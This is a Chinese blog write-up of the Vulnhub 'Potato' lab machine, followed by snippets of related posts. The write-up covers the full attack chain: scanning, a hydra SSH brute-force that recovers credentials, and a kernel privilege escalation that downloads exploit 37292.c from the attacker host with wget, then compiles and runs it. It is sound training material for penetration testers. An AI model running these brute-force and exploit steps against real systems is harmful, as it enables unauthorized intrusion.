Vulnhub靶机实战-Potato (SunCSR)

最新推荐文章于 2025-06-13 21:15:54 发布
原创 最新推荐文章于 2025-06-13 21:15:54 发布 · 1.7k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#vulnhub #渗透测试 #靶机实战

本文记录了一次从信息收集到提权的完整渗透测试过程。通过端口扫描发现目标开放了80和7120端口,其中80端口提供了一个简单的web服务,而7120端口为SSH服务。利用字典爆破SSH服务成功获得shell权限,并最终通过内核漏洞实现了提权。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

声明

好好学习,天天向上

搭建

vmware打开,网络和攻击机一样,要么都用桥接要么都用NAT

渗透

存活扫描,发现目标

arp-scan -l

端口扫描

nmap -T4 -A 192.168.31.164 -p 1-65535 -oN nmap.A

在这里插入图片描述

开启端口

发现开启80,7120

7120ssh没有用默认端口,好评

访问80

http://192.168.31.164

竟然是个图像大土豆

在这里插入图片描述

果断扫描目录

python3 dirsearch.py -u 192.168.31.164

在这里插入图片描述

info.php可以看到一些敏感信息,并无什么特别的发现,80没发现什么,也没有多余的目录可以继续探索,只能爆破了

爆破吧

先生成社工字典

cewl http://192.168.31.164/ -w user.dic

注意把首字母变成小写再来一遍

在这里插入图片描述

git上拿到top1000字典

https://github.com/k8gege/PasswordDic/blob/master/top1000.txt

hydra爆破ssh

hydra -L user.dic -P top1000.txt -vV ssh://192.168.31.164:7120 -f
pomato/letmein

在这里插入图片描述

ssh登录

ssh -p 7120 potato@192.168.31.164
letmein

在这里插入图片描述

准备提权,kali执行

searchsploit 3.13.0
cp /usr/share/exploitdb/exploits/linux/local/37292.c  ./37292.c
python -m SimpleHTTPServer 5555

靶机执行

cd /tmp
wget http://192.168.31.64:5555/37292.c
gcc 37292.c -o exp
chmod +x exp
./exp

在这里插入图片描述

总结

1.信息收集

端口发现80和7120

80只发现了phpinfo

7120是ssh

2.web权限

3.shell权限

通过ssh爆破,使用top1000字典,爆破进去了7120

4.权限维持

5.提权

通过系统内核进行提权

Vulnhub-potato靶机实战
千寻的博客
01-12 1156
文章目录学习笔记下载靶机下载第一部分 信息收集第一步 主机发现第二步 端口扫描第三步 访问网站第四步 扫描目录第四步 访问扫描出的目录第五步 回到开放的端口,分析,发现7120开放第二部分 ssh利用使用Hydra破解ssh第三部分 提权第一步 查看基本的系统信息第二步 利用MSF查找可利用的漏洞第三步 将文件上传到靶机第四步 查找flag摘抄 学习笔记下载 https://download.csdn.net/download/qq_41901122/14122921 靶机下载 https://www.
PotatoSunscr靶机渗透攻略 ----------hydra暴力破解实战训练
z2560088的博客
09-21 960
准备工作 靶机下载 ​​​​​​https://www.vulnhub.com/entry/potato-suncsr-1,556/ 可用迅雷下载,也可以点第二个直接下载 下载后添加至虚拟机,设置网卡为NAT模式 攻击机:kali虚拟机 网卡为NAT模式 ip地址为192.168.160.129 开始攻击 扫描当前网段下存活主机 nmap -sV 192.168.160.0/24 或者 arp-scan -l 可确定靶机IP为192.168.160.13...
VulnHub渗透测试实战靶场 - POTATO (SUNCSR): 1
LYJ20010728的博客
08-20 1786
@[TOC](VulnHub渗透测试实战靶场 - POTATO (SUNCSR): 1) 环境下载 戳此进行环境下载 POTATO (SUNCSR): 1靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l 得到目标靶机的IP为:192.168.246.139 使用 nmap 扫描开放的端口:sudo nmap -sC -sV -p 1-65535 192.1
OSCP靶机21--potato
最新发布
faclon666的博客
06-13 818
也就是说,strcmp函数,当传入非字符串类型(如数组)时,函数会报错,但在 ​​PHP 5.3 之前的版本中​​,错误处理逻辑会错误地 ​​返回。我估计这个中括号里边默认为0,所以,array(0 => ' ')。三个log文件的请求都是一样的,只是文件名不一样,所以需要一个好的爆破字典。(这靶场也是挺奇怪,一会行一会儿不行的),我本来是用burp爆破,但是没有成果。发现文件包含的同时,也可以查看/dashboard.php文件,代码审计后。分析代码--》账户名有个admin,密码是potato
potato靶机
2301_77132421的博客
04-02 1065
确定kali自己的ip:192.168.91.139查找靶机的ip:nmap 192.168.91.0/24打开浏览器,输入靶机的ip地址是一个土豆potato,没有别的信息再详细扫描一下ip:nmap 192.168.91.143 -A -p-可以看到除了80端口,还开启了一个7120的ssh端口结合刚才的网页是一个土豆,可以猜测一下,它的用户名就是potato,我们使用九头蛇来进行密码爆破试一下爆破到了用户名:potato密码:letmein。
Potato靶机测试
m0_56375711的博客
08-21 1772
potato靶机渗透
Vulnhub靶机实战-POTATO-WP
黑白的博客
01-18 894
声明 好好学习,天天向上 搭建 virtualbox打开,网络和攻击机一样,要么都用桥接要么都用NAT 渗透 存活扫描,发现目标 arp-scan -l 端口扫描 nmap -T4 -A 192.168.31.66 -p 1-65535 -oN nmap.A 开启端口 发现开启80,22,2122 访问80 http://192.168.31.66 扫描目录 python3 dirsearch.py -u 192.168.31.66 挨个试一试,发现 /admin需要密码 /admin/logs
Potato靶机
qq_44640313的博客
10-15 1459
hydra爆破ssh密码,Linux 内核漏洞提权
VulnHub-Potato (SunCSR)靶场
m0_74631795的博客
08-12 769
在 Kali Linux 中,searchsploit 是一个非常有用的命令行工具,它允许用户快速搜索 Exploit Database 上的漏洞利用代码。Exploit Database 是一个庞大的、不断更新的数据库,其中包含了各种漏洞的利用代码和相关信息。searchsploit -m 命令是用来下载 Exploit Database 中的特定漏洞利用代码到本地系统的。当你使用 -m 参数时,它会下载与搜索结果相关的整个文件,而不仅仅是显示信息。因为不知道密码,所以用大写参数,后面跟密码字典路径。
potato-suncsr靶机详解
weixin_44681307的博客
07-10 755
登陆上以后发现就一个大土豆,扫描了一下目录就扫到一个phpinfo页面,也没什么用,这个网页标题是个potato,就想着爆破一下密码,结果很快就出来了个密码。ssh登陆一下,这个靶场里面依然搜索不到什么可用的东西,sudo -l 或者 查找有root权限的文件都没有可用的。首先扫描靶机ip地址,找到以后我又对靶机进行了一个全端口扫描,发现它的ssh端口号是7120.这个靶机说是一个简单偏难的,但是我觉得这个靶机是我做过最简单的一个。发现还不少,我就直接用了第一个。简单的不能再简单的一个靶场。
适合新手的Vulnhub简单靶机potato
2401_82463993的博客
03-10 1675
目的是通过使用给定的用户名和密码字典文件尝试连接到 SSH 服务器(在 IP 地址 10.4.7.140,端口 7120)在kali里再打开一个终端,搜一下ubuntu 14.04版本的漏洞。通过之前的端口信息知道它用的是ubuntu的服务器。然后执行这个exp文件,就获得root权限了。然后远程登录一下(连接端口为7120)访问下他的网页 10.4.7.140。通过爆破获得了一个用户的账号密码。nmap看看都开放了那些端口。ssh爆破他的7120端口。跟他的靶机名一样是个土豆。看下ubuntu的版本。
Vulnhubpotato.zip
01-12
Vulnhubpotato靶机靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的过程文档,供大家参考学习
Potato_Desktop
09-20
Potato_Desktop 国外聊天软件
potato
03-16
土豆 -------------------------------------------
OSCP Potato靶机 超详细教学
m0_52545432的博客
05-06 488
nmap直接开扫-p- 全端口扫描-A 表示 aggressive,可以理解为全面扫描80 http协议22 ssh协议2112 FTP协议2112放了一个FTP,可以通过默认的用户名登录进去,用户名为anonymous 密码随便填由于不是默认的端口,所以ftp登录时需要指定一下端口,命令为230说明匿名登录成功binary 以二进制模式传输文件,保证文件完整get命令下载文件到桌面一段php代码,应该是登录页面的备份,固定了用户名是admin另外一个文件是。
potato靶机的wp
玄道的网安博客
08-30 1417
5、查看info.php中可能存在的一些信息,一般可以看下根路径、ip、还有一些配置的开启情况。这边发现是符合本地文件包含的条件的,但是翻遍现有的源代码没有找到可以利用的参数。2、在扫到端口开放情况后,用-A针对这俩端口进行一次扫描,ubuntu系统,有web服务,7120是他的ssh服务。),下载好以后在虚拟机软件中打开(本人使用的是vmware),设置为nat模式,同kali在同一网段下以后,可以用。7、这边也是成功ssh登录,不过vulnhub的部分旧的靶机似乎普通用户这里没有flag。
vulnhub-Potato-wp
yutianovo的博客
09-13 707
靶机描述 blog http://blog.yutian233.xyz/ VM name : Potato Type: Boot to Root DHCP : Enabled Difficulty : Easy to medium Goal: 2 flags (user.txt and root.txt) This VM has been tested with VirtualBox 下载 https://www.vulnhub.com/entry/potato-1,529/ 清单 信息搜集 ne
vulnhub Potato: 1
箭雨镜屋
08-15 972
渗透思路:nmap扫描端口 ---- ftp匿名登录下载网站代码 ---- gobuster扫描网站目录 ---- 利用php type juggling漏洞登录网站 ---- 利用LFI获取/etc/passwd ---- john爆破webadmin用户的密码 ---- sudo配合目录遍历提权
vulnhub靶机AI-WEB1
01-19
### 关于VulnHub靶机AI-WEB1的信息 针对VulnHub平台上的AI-WEB1靶机,该虚拟机旨在提供给有兴趣了解Web应用程序安全性的个人一种实践环境。通过这一挑战,参与者可以探索常见的Web应用漏洞以及如何利用这些弱点来获得系统的进一步访问权限。 #### 初始侦察阶段 在开始任何实际攻击之前,进行全面的情报搜集至关重要。这通常涉及到使用诸如`Nmap`这样的工具来进行端口扫描和服务版本检测: ```bash nmap -A <target_IP> ``` 上述命令能够揭示开放的服务及其潜在的安全配置缺陷[^3]。 #### Web服务器枚举 一旦确认目标运行着HTTP(S)服务,则应立即启动目录遍历尝试。可借助像`Dirb`或更现代的选择如`Gobuster`等工具完成这项工作: ```bash gobuster dir -u http://<target_ip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt ``` 此过程有助于发现隐藏页面和管理接口,它们可能是后续入侵的关键入口点。 #### 应用层挖掘 对于基于PHP构建的应用程序来说,源码泄露是一个常见问题。如果运气好,在上一步找到的路径里可能会存在`.php~`或其他临时文件形式暴露出来的代码片段。仔细审查这部分内容往往能带来意想不到的收获——比如硬编码凭证或是调试模式下的敏感信息泄漏。 #### 数据库交互测试 许多老旧CMS(内容管理系统)容易受到SQL注入的影响。当遇到带有查询参数的URL时,不妨试试经典的单引号闭合技巧;而对于表单提交,则可通过修改POST数据包中的字段名与值组合来进行试探性输入验证绕过[^8]。 #### 提升权限方法 成功突破前端防护之后,下一步便是考虑怎样扩大战果直至取得root shell。Linux系统下,检查SUID位设置不当的二进制文件是一项基本技能;而Windows环境中则需留意计划任务、注册表键值异常变动等情况。 #### Drupal特定注意事项 鉴于部分描述提及到Drupal CMS, 若确实如此的话,值得注意的是有关于此框架内核升级机制的一个已知特性:即管理员账户密码可以通过编辑数据库记录的方式实现重置而不依赖原有认证流程[^9]。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值